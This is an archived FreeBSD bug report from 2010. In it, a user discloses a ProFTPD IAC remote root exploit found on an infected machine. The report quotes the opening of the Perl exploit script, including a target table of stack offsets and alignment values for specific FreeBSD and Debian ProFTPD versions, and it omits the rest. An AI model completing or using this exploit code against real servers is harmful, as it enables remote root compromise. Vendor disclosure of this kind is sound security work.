Date: Wed, 10 Nov 2010 09:18:51 GMT From: Michel van Gruijthuijsen <mistige@gmail.com> To: freebsd-gnats-submit@FreeBSD.org Subject: misc/152100: found an exploit on freebsd, "known to work" , in an infected (linux) machine Message-ID: <201011100918.oAA9IpY0006640@www.freebsd.org> Resent-Message-ID: <201011100920.oAA9K8xh029493@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 152100 >Category: misc >Synopsis: found an exploit on freebsd, "known to work" , in an infected (linux) machine >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 10 09:20:08 UTC 2010 >Closed-Date: >Last-Modified: >Originator: Michel van Gruijthuijsen >Release: 8.x is at least one of the targeted. >Organization: - >Environment: >Description: #!/usr/bin/perl # Exploit Title: ProFTPD IAC Remote Root Exploit # Date: 7 November 2010 # Author: Kingcope use IO::Socket; $numtargets = 13; @targets = ( # Plain Stack Smashing #Confirmed to work ["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC "FreeBSD", # OPERATING SYSTEM 0, # EXPLOIT STYLE 0xbfbfe000, # OFFSET START 0xbfbfff00, # OFFSET END 1029], # ALIGN #Confirmed to work ["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)", "FreeBSD", 0, 0xbfbfe000, 0xbfbfff00, 1021], # Return into Libc #Confirmed to work ["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, # EXPLOIT STYLE 0x0804CCD4, # write(2) offset 8189, # ALIGN 0], # PADDING [.....], I can send you the whole thing if you want. >How-To-Repeat: It's an exploit. >Fix: >Release-Note: >Audit-Trail: >Unformatted:
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?201011100918.oAA9IpY0006640>